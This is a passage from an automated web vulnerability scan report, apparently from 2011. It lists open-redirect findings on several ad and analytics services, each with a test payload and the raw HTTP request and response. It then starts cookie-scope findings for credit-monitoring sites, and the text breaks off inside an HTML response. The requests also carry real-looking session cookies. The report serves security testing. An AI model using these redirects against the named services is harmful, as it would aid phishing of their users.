Location: http://a2caa6b055535825b/a%3f295510%3b%3fhttp%3a//equifax.com/free30daytrial/%3fCMP%3dKNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50?gclid=CNf214_1tagCFeM85Qod4FaqEA
Set-Cookie: id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 19:55:25 GMT
Server: GFE/2.0
Content-Type: text/html


16.3. http://ad.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//ae99aaa9aac3cd333/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1470&id=1&r=http%3a//ae99aaa9aac3cd333/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_gtgz=7p9%3A0%3A1; rth=2-ljzkpb-7p9~0~1~1-; uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sun, 24 Apr 2011 19:55:18 GMT
Location: http://ae99aaa9aac3cd333/a?
Connection: close
Set-Cookie: T_gtgz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cs33=dlx%3A6paw%3A1; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:55:19 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-dlx~6paw~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Mon, 23-Apr-2012 19:55:19 GMT; Path=/
Content-Length: 0


16.4. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//ac292087abed237a6/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035308&d.c=http%3a//ac292087abed237a6/a%3fgif&d.o=pcwmw-pcworld&d.x=192052059&d.t=page&d.u=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ac292087abed237a6/a?gif
Date: Sun, 24 Apr 2011 19:51:36 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 19:51:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.5. http://bh.contextweb.com/bh/rtset [rurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a872279de0b21889d/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http%3a//a872279de0b21889d/a%3fhttp%3a//matcher.bidder7.mookie1.com/do-association%3freturn%3dctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 15:27:46 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Mon, 23-Apr-2012 15:27:46 GMT; Path=/
Location: http://a872279de0b21889d/a?http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Sun, 24 Apr 2011 15:27:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


16.6. https://crm.infusionsoft.com/aff.html [to parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://crm.infusionsoft.com
Path:   /aff.html

Issue detail

The value of the to request parameter is used to perform an HTTP redirect. The payload http%3a//ad6d6ea873abe6472/a%3fhttps%3a//cam.infusionsoft.com/cart/process%3fpackageCode%3dstandard was submitted in the to parameter. This caused a redirection to the following URL:

Request

GET /aff.html?to=http%3a//ad6d6ea873abe6472/a%3fhttps%3a//cam.infusionsoft.com/cart/process%3fpackageCode%3dstandard HTTP/1.1
Host: crm.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=footer_psr; src=web; contactId=0; jumpLog=6315978; linkedJumpLog=""; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://ad6d6ea873abe6472/a?https://cam.infusionsoft.com/cart/process?packageCode=standard&affiliate=0
Content-Length: 0
Date: Mon, 25 Apr 2011 01:42:56 GMT


16.7. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022 [vvp parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022

Issue detail

The value of the vvp request parameter is used to perform an HTTP redirect. The payload http%3a//a3d017b0ba65ff567/a%3fDFA%231516833%3av18%3d[["DFA-"%2blis%2b"-"%2blip%2b"-"%2blastimp%2b"-"%2blastimptime%2b"-"%2blcs%2b"-"%2blcp%2b"-"%2blastclk%2b"-"%2blastclktime]] was submitted in the vvp parameter. This caused a redirection to the following URL:

Request

GET /b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022?AQB=1&pccr=true&vidn=26DA3ED4051D0814-60000137E022F418&&ndh=1&t=24/3/2011%2014%3A44%3A52%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=http%3A//equifax.com/free30daytrial/%3FCMP%3DKNC-Google%26HBX_PK%3Dcredit_monitoring_service%26HBX_OU%3D50%26gclid%3DCNf214_1tagCFeM85Qod4FaqEA&cc=USD&vvp=http%3a//a3d017b0ba65ff567/a%3fDFA%231516833%3av18%3d[["DFA-"%2blis%2b"-"%2blip%2b"-"%2blastimp%2b"-"%2blastimptime%2b"-"%2blcs%2b"-"%2blcp%2b"-"%2blastclk%2b"-"%2blastclktime]]&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: equifaxps.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi=[CS]v1|26DA3ED4051D0814-60000137E022F418[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:04:38 GMT
Server: Omniture DC/2.0.0
Location: http://a3d017b0ba65ff567/a?DFA
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 20:04:38 GMT
Last-Modified: Mon, 25 Apr 2011 20:04:38 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www270
Content-Length: 0
Content-Type: text/plain


16.8. http://gravatar.com/avatar.php [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gravatar.com
Path:   /avatar.php

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a9ab5b358e0c21be6/a%3fhttp%3a//visitmix.com/images/contributeDefaultAvatar.gif was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar.php?d=http%3a//a9ab5b358e0c21be6/a%3fhttp%3a//visitmix.com/images/contributeDefaultAvatar.gif&gravatar_id=2157f1cfa2c6f144cefad2943b805aac HTTP/1.1
Host: gravatar.com
Proxy-Connection: keep-alive
Referer: http://visitmix.com/writings/how-crud-is-your-design
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 24 Apr 2011 17:08:01 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a9ab5b358e0c21be6/a?http://visitmix.com/images/contributeDefaultAvatar.gif
Content-Length: 0
X-Varnish: 391176232
Via: 1.1 varnish
Expires: Sun, 24 Apr 2011 17:13:01 GMT
Cache-Control: max-age=300
Source-Age: 0


16.9. http://sftrack.searchforce.net/SFConversionTracking/redir [jr parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sftrack.searchforce.net
Path:   /SFConversionTracking/redir

Issue detail

The value of the jr request parameter is used to perform an HTTP redirect. The payload http%3a//aee4e913b94afcefc/a%3fhttp%3a//landing.americanexpress.com/v2.php%3ftype%3dv2 was submitted in the jr parameter. This caused a redirection to the following URL:

Request

GET /SFConversionTracking/redir?jadid=6589725365&jk=credit%20monitoring%20service&js=1&jmt=1_b_&jp=&jkId=8a8ae4e72e3a0b58012e4f128cd461ee&jaid=27686&jt=3&jsid=21865&jr=http%3a//aee4e913b94afcefc/a%3fhttp%3a//landing.americanexpress.com/v2.php%3ftype%3dv2&&gclid=CNqttZH1tagCFQbe4AodEirYCA HTTP/1.1
Host: sftrack.searchforce.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: sf_conv_info_27686=cid%3D4fca07b8-eb53-4b8e-9f32-3e4b90bd6de6%26csesid%3D21865%26caid%3D27686%26csk%3Dcredit+monitoring+service%26cmt%3D1_b_%26clandtime%3D04%2F24%2F2011+13%3A00%3A55+PDT%26ctest%3Dfalse%26cadoid%3D1%26ckfk%3D8a8ae4e72e3a0b58012e4f128cd461ee%26cagfk%3D%26cadid%3D6589725365%26ckid%3D-1%26cp%3D%26; Expires=Tue, 24-May-2011 20:00:55 GMT
P3P: policyref="http://sftrack.searchforce.net/SFConversionTracking/w3c/p3p.xml", CP="NOI CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Referer:
Location: http://aee4e913b94afcefc/a?http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
Content-Length: 0
Date: Sun, 24 Apr 2011 20:00:54 GMT


16.10. http://www.googleadservices.com/pagead/aclk [adurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 was submitted in the adurl parameter. This caused a redirection to the following URL:

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CtACQktrYnA1QmEwVGQzd0ZvejJsQWVieXJDd0NkZnEtTk1CbjZDVTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUtNVFl3ZURZd01GOWhjOGdCQ2RvQlNXaDBkSEE2THk5d2RXSXVjbVYwWVdsc1pYSXRZVzFoZW05dUxtNWxkQzlpWVc1dVpYSmZNVEl3WHpZd01GOWhMbkJvY0Q5elpXRnlZMmc5SlRkQ0pHdGxlWGR2Y21RbE4wU1lBdVFad0FJRXlBS0YwczhLcUFNQjZBTzhBZWdEbEFMMUF3QUFBTVNBQnVpM3pxckJqcktHMFFFEhMIk4a2vpW1qAIVBN7gCh2VGI4LGAEgq9z04ueQw4h2SAE; expires=Tue, 24-May-2011 12:36:41 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://a2e8cc29eb5c3fdf9/a?http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:36:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


17. Cookie scoped to parent domain  previous  next
There are 172 instances of this issue:


17.1. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.credit.com
Path:   /r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order HTTP/1.1
Host: www.credit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:09:32 GMT
Server: Apache/2
Cache-Control: private, max-age=180
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Location: https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-275c2775175765385a21
Content-Length: 193
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:09:32 GMT
Set-Cookie: cuc=1303675772884*http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order; path=/; expires=Mon, 25-Apr-2011 20:09:32 GMT
Set-Cookie: ex=275c2775; domain=.credit.com; path=/
Set-Cookie: JSESSIONID=cab5ARwscbhOo4K6zij_s; domain=credit.com; path=/
Expires: Sun, 24 Apr 2011 20:12:32 GMT
Content-Type: text/plain

The URL has moved <a href="https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-275c2775175765385a21">here</a>

17.2. http://www.fightidentitytheft.com/credit-monitoring.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-monitoring.html HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=8d6f98f4d20d1ff037ac5b3e30142094; expires=Tue, 17-May-2011 23:19:27 GMT; path=/; domain=.fightidentitytheft.com
Last-Modified: Sun, 24 Apr 2011 19:17:59 GMT
ETag: "ebec15374e4c8c133be90bb1430afb94"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 25663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
